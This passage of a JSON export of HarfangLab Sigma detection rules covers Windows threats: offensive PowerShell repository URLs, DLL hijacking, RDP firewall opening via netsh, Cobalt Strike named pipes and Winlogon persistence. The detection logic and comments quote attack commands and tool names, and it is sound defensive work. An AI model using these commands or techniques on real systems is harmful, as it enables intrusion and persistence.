'LwBzAGUAbgBzAGUALQBvAGYALQBzAGUAYwB1AHIAaQB0AHkALw'\n - '8AcwBlAG4AcwBlAC0AbwBmAC0AcwBlAGMAdQByAGkAdAB5AC8A'\n - 'vAHMAZQBuAHMAZQAtAG8AZgAtAHMAZQBjAHUAcgBpAHQAeQAvA'\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-ADM.ps1\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-DS.ps1\n - '/Friends-Security/'\n - 'LwBGAHIAaQBlAG4AZABzAC0AUwBlAGMAdQByAGkAdAB5AC8A'\n - '8ARgByAGkAZQBuAGQAcwAtAFMAZQBjAHUAcgBpAHQAeQAvA'\n - 'vAEYAcgBpAGUAbgBkAHMALQBTAGUAYwB1AHIAaQB0AHkALw'\n # https://github.com/dafthack/GraphRunner\n # https://github.com/dafthack/MFASweep\n # https://github.com/dafthack/MailSniper\n - '/dafthack/'\n - 'LwBkAGEAZgB0AGgAYQBjAGsALw'\n - '8AZABhAGYAdABoAGEAYwBrAC8A'\n - 'vAGQAYQBmAHQAaABhAGMAawAvA'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2029c7d2-ce99-4765-bef4-8aa8277d9a50",
"rule_name": "URLs of Malicious Code Repository in PowerShell Script",
"rule_description": "Detects PowerShell scripts containing URLs that reference known malicious code or offensive tooling repositories.\nThreat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\nIt is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack or ongoing malicious activity.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2097d94f-4a7d-417e-8cb0-063a71e4cd4c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591189Z",
"creation_date": "2026-03-23T11:45:34.591192Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591200Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_scriptrunner.yml",
"content": "title: DLL Hijacking via ScriptRunner.exe\nid: 2097d94f-4a7d-417e-8cb0-063a71e4cd4c\ndescription: |\n Detects potential Windows DLL Hijacking via ScriptRunner.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting a malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ScriptRunner.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2097d94f-4a7d-417e-8cb0-063a71e4cd4c",
"rule_name": "DLL Hijacking via ScriptRunner.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ScriptRunner.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting a malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "20bddb6e-34a9-4ce0-821d-1a33c767e9a7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078839Z",
"creation_date": "2026-03-23T11:45:34.078841Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078846Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.helpwire.app/blog/enable-remote-desktop-command-line/",
"https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/",
"https://thedfirreport.com/2021/05/12/conti-ransomware/",
"https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior#command-example-8-enable-specific-services",
"https://attack.mitre.org/techniques/T1562/004/",
"https://attack.mitre.org/techniques/T1021/001/"
],
"name": "t1562_004_firewall_allow_rdp.yml",
"content": "title: Remote Desktop Traffic Enabled via netsh\nid: 20bddb6e-34a9-4ce0-821d-1a33c767e9a7\ndescription: |\n Detects a firewall filter modification that allows RDP traffic to pass through.\n Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\n It is recommended to analyze the process responsible for the execution of netsh.exe, to look for other suspicious activities on the host and to investigate subsequent malicious RDP connections to the host.\nreferences:\n - https://www.helpwire.app/blog/enable-remote-desktop-command-line/\n - https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/\n - https://thedfirreport.com/2021/05/12/conti-ransomware/\n - https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior#command-example-8-enable-specific-services\n - https://attack.mitre.org/techniques/T1562/004/\n - https://attack.mitre.org/techniques/T1021/001/\ndate: 2022/12/01\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - attack.lateral_movement\n - attack.t1021.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_netsh1:\n Image|endswith: '\\netsh.exe'\n # netsh firewall set service RemoteDesktop enable\n # netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes\n CommandLine|contains|all:\n - 'firewall'\n - 'set'\n - 'remote'\n - 'desktop'\n - 'enable'\n selection_netsh2:\n Image|endswith: '\\netsh.exe'\n # netsh advfirewall firewall add rule name=\"rdp\" dir=in protocol=tcp localport=3389 
action=allow\n CommandLine|contains|all:\n - 'firewall'\n - 'add rule'\n - 'rdp'\n - 'allow'\n - '3389'\n\n # Exclusion for firewall activation\n # netsh advfirewall firewall set rule group=\"remote desktop\" new enable=no\n filter_disable:\n CommandLine|contains|all:\n - 'set rule'\n - 'enable'\n - 'no'\n\n exclusion_open_nebula:\n Ancestors|contains:\n - '|?:\\Program Files\\OpenNebula\\rhsrvany.exe|'\n - '|?:\\Program Files (x86)\\OpenNebula\\rhsrvany.exe|'\n\n # https://learn.microsoft.com/fr-fr/windows-hardware/manufacture/desktop/add-a-custom-script-to-windows-setup?view=windows-11\n exclusion_setupcomplete:\n ParentCommandLine|endswith: '\\cmd.exe /c ?:\\Windows\\Setup\\Scripts\\SetupComplete.cmd'\n\n exclusion_siemens:\n ProcessGrandparentImage: '?:\\Windows\\Temp\\TSplusInstaller\\Setup-Siemens.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'TSplus SAS'\n\n exclusion_medulla:\n CommandLine|startswith: 'netsh advfirewall firewall add rule name=Remote Desktop for Medulla'\n\n exclusion_syngo:\n ParentCommandLine|contains:\n - '\\syngo_delta_pkg\\setup\\FeatureInstallServer.bat'\n - '\\Program Files\\Siemens\\syngo\\bin\\Common\\'\n\n exclusion_TSplus_AdminTool:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\AdminTool.exe'\n\n exclusion_svcr:\n ProcessGrandparentImage|endswith: '\\svcr.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature|contains: 'Remote Access World SAS'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "20bddb6e-34a9-4ce0-821d-1a33c767e9a7",
"rule_name": "Remote Desktop Traffic Enabled via netsh",
"rule_description": "Detects a firewall filter modification that allows RDP traffic to pass through.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nIt is recommended to analyze the process responsible for the execution of netsh.exe, to look for other suspicious activities on the host and to investigate subsequent malicious RDP connections to the host.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "20bf9b2e-173e-4162-b9c8-d50e1b4b38ff",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081735Z",
"creation_date": "2026-03-23T11:45:34.081737Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081741Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mdeserver.yml",
"content": "title: DLL Hijacking via mdeserver.exe\nid: 20bf9b2e-173e-4162-b9c8-d50e1b4b38ff\ndescription: |\n Detects potential Windows DLL Hijacking via mdeserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mdeserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d3d11.dll'\n - '\\dxgi.dll'\n - '\\MFPlat.DLL'\n - '\\RTWorkQ.DLL'\n - '\\SspiCli.dll'\n - '\\winmde.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "20bf9b2e-173e-4162-b9c8-d50e1b4b38ff",
"rule_name": "DLL Hijacking via mdeserver.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mdeserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "20cfd136-f946-4130-a522-6597ff877ac3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072975Z",
"creation_date": "2026-03-23T11:45:34.072977Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072981Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/",
"https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
"https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/",
"https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8",
"https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752",
"https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py",
"https://attack.mitre.org/techniques/T1021/002/"
],
"name": "t1021_002_custom_cobaltstrike_named_pipes_connected.yml",
"content": "title: Custom CobaltStrike Named Pipe Connected\nid: 20cfd136-f946-4130-a522-6597ff877ac3\ndescription: |\n Detects the connection to a Named Pipe pertaining to the CobaltStrike framework.\n These are custom CobaltStrike Named Pipe as seen in previous attacks.\n CobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\n It is recommended to investigate the process that created the named pipe to determine its legitimacy.\nreferences:\n - https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects/\n - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n - https://www.vanimpe.eu/2021/09/12/cobalt-strike-hunting-key-items-to-look-for/\n - https://medium.com/falconforce/falconfriday-suspicious-named-pipe-events-0xff1b-fe475d7ebd8\n - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\n - https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2022/07/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - attack.execution\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName:\n - '\\mojo.5688.8052.183894939787088877*'\n - '\\mojo.5688.8052.35780273329370473*'\n - '\\scerpc_*'\n - '\\win_svc*'\n - '\\demoagent_11*'\n - '\\demoagent_22*'\n - '\\Winsock2\\CatalogChangeListener-*-0,'\n - '\\wkssvc_??'\n - '\\ntsvcs??'\n - '\\DserNamePipe??'\n - '\\PGMessagePipe??'\n - '\\SearchTextHarvester??'\n - '\\mypipe-f??'\n - '\\mypipe-h??'\n - '\\windows.update.manager??'\n - '\\windows.update.manager???'\n - '\\MsFteWds??'\n - '\\f4c3??'\n - '\\f53f??'\n - '\\fullduplex_??'\n - '\\msrpc_????'\n - 
'\\win\\msrpc_??'\n - '\\rpc_??'\n - '\\spoolss_??'\n # https://github.com/threatexpress/random_c2_profile/blob/main/core/functions.py\n - '\\ProtectionManager_????_??'\n - '\\ProtectionManager_??'\n - '\\Winsock2\\\\CatalogChangeListener-???????-1'\n - '\\Winsock2\\\\CatalogChangeListener-??-??'\n - '\\Spool\\\\pipe_????_??'\n - '\\Spool\\\\pipe_??'\n - '\\WkSvcPipeMgr_??????'\n - '\\WkSvcPipeMgr_??'\n - '\\NetClient_??????'\n - '\\NetClient_??'\n - '\\RPC_??????'\n - '\\WiFiNetMgr????_??'\n - '\\WiFiNetMgr_??'\n - '\\AuthPipeD_??'\n\n exclusion_trendmicro:\n PipeName:\n - '\\f4c3??'\n - '\\f53f??'\n ProcessImage:\n - '?:\\Program Files\\Trend Micro\\\\*'\n - '?:\\Program Files (x86)\\Trend Micro\\\\*'\n ProcessSigned: 'true'\n ProcessSignature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "20cfd136-f946-4130-a522-6597ff877ac3",
"rule_name": "Custom CobaltStrike Named Pipe Connected",
"rule_description": "Detects the connection to a Named Pipe pertaining to the CobaltStrike framework.\nThese are custom CobaltStrike Named Pipes as seen in previous attacks.\nCobaltStrike uses Named Pipes mainly to follow its deployment status and to self-replicate using SMB.\nIt is recommended to investigate the process that created the named pipe to determine its legitimacy.\n",
"rule_creation_date": "2022-07-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "20feacae-9a99-4ce6-8f8c-c02176cb730a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620673Z",
"creation_date": "2026-03-23T11:45:34.620675Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620680Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/persistence/windows-logon-helper",
"https://persistence-info.github.io/Data/mpnotify.html",
"https://twitter.com/0gtweet/status/1548604288611614725",
"https://attack.mitre.org/techniques/T1547/004/"
],
"name": "t1547_004_persistence_winlogon_helper.yml",
"content": "title: Winlogon Helper DLL Installed\nid: 20feacae-9a99-4ce6-8f8c-c02176cb730a\ndescription: |\n Detects a change of the Winlogon configuration via registry modification.\n Attackers may abuse features of Winlogon to execute DLLs and/or executables at user logon.\n It is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\nreferences:\n - https://www.ired.team/offensive-security/persistence/windows-logon-helper\n - https://persistence-info.github.io/Data/mpnotify.html\n - https://twitter.com/0gtweet/status/1548604288611614725\n - https://attack.mitre.org/techniques/T1547/004/\ndate: 2020/09/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1547.004\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_winlogon:\n EventType: SetValue\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n\n selection_notify:\n EventType: SetValue\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\\\*\\DllName'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\\\*\\DllName'\n\n # Detects suspicious persistence by creating the mpnotify value.\n # The executable will be loaded by the winlogon.exe process at user logon.\n # The new process will be terminated after a timeout of 30 seconds.\n selection_mpnotify:\n EventType: SetValue\n TargetObject: 
'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_userinit:\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details:\n # cannot use *\\userinit.exe because one could add its persistence before the userinit entry and we would miss it\n - '?:\\windows\\system32\\userinit.exe,'\n - '?:\\windows\\system32\\userinit.exe'\n - '?:\\windows\\syswow64\\userinit.exe,'\n - '?:\\windows\\syswow64\\userinit.exe'\n - 'userinit.exe'\n - 'userinit.exe,'\n - '?:\\windows\\system32\\kusrinit.exe,' # DELL/Kace agent\n - '?:\\WINDOWS\\system32\\userinit.exe,?:\\windows\\system32\\KUsrInit.exe,'\n - '?:\\Windows\\system32\\Cliaca2kp.exe,?:\\Windows\\System32\\KUsrInit.exe' # IACA, DELL/Kace agent\n - '?:\\windows\\system32\\userinit.exe,\"?:\\program files\\vmware\\vmware view\\agent\\bin\\wssm.exe\",' # VMWare view agent\n - '?:\\windows\\system32\\userinit.exe,\"?:\\program files\\unidesk\\layering services\\layerinfo.exe\",' # CITRIX app layering\n - '?:\\Windows\\system32\\userinit.exe,?:\\Program 
Files (x86)\\HP\\HP ProtectTools Security Manager\\Bin\\DPAgent.exe,' # HP ProtectTools agent\n - '?:\\Windows\\system32\\userinit.exe,?:\\Program Files (x86)\\Hewlett-Packard\\HP ProtectTools Security Manager\\Bin\\DPAgent.exe,'\n - '?:\\WINDOWS\\system32\\userinit.exe,\"?:\\Program Files (x86)\\Avencis\\SSOX\\SessionManager+.exe\"' # Avencis\n\n exclusion_shell_explorer:\n TargetObject|endswith:\n - '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'explorer.exe'\n\n exclusion_sccertprop:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ScCertProp\\DllName'\n Details|contains: 'wlnotify.dll'\n\n exclusion_logmein_gotoassist:\n TargetObject:\n - '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\GoToAssist Express Customer\\DLLName'\n - '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\GoToAssist\\DLLName'\n Details|endswith:\n - 'g2ax_winlogonx64.dll'\n - 'g2awinlogon_x64.dll'\n # FIXME: waiting for agent in production to support those fields\n # ProcessSignature: 'LogMeIn, Inc.'\n # ProcessSigned: 'true'\n\n exclusion_citrix:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\MetaFrame\\DLLName'\n Details: 'ctxnotif.dll'\n exclusion_citrix_icaservice:\n TargetObject: '*\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\cpwswlx\\DLLName'\n Details:\n - '?:\\program files\\citrix\\icaservice\\cpwswlx64.dll'\n - '?:\\Program Files\\Citrix\\HDX\\bin\\CpWsWlx64.dll'\n exclusion_citrix_selfservice:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\shell'\n Details: '?:\\Program Files (x86)\\Citrix\\ICA Client\\SelfServicePlugin\\selfservice.exe'\n\n exclusion_userlock_agent:\n TargetObject|endswith: '\\Software\\Microsoft\\Windows 
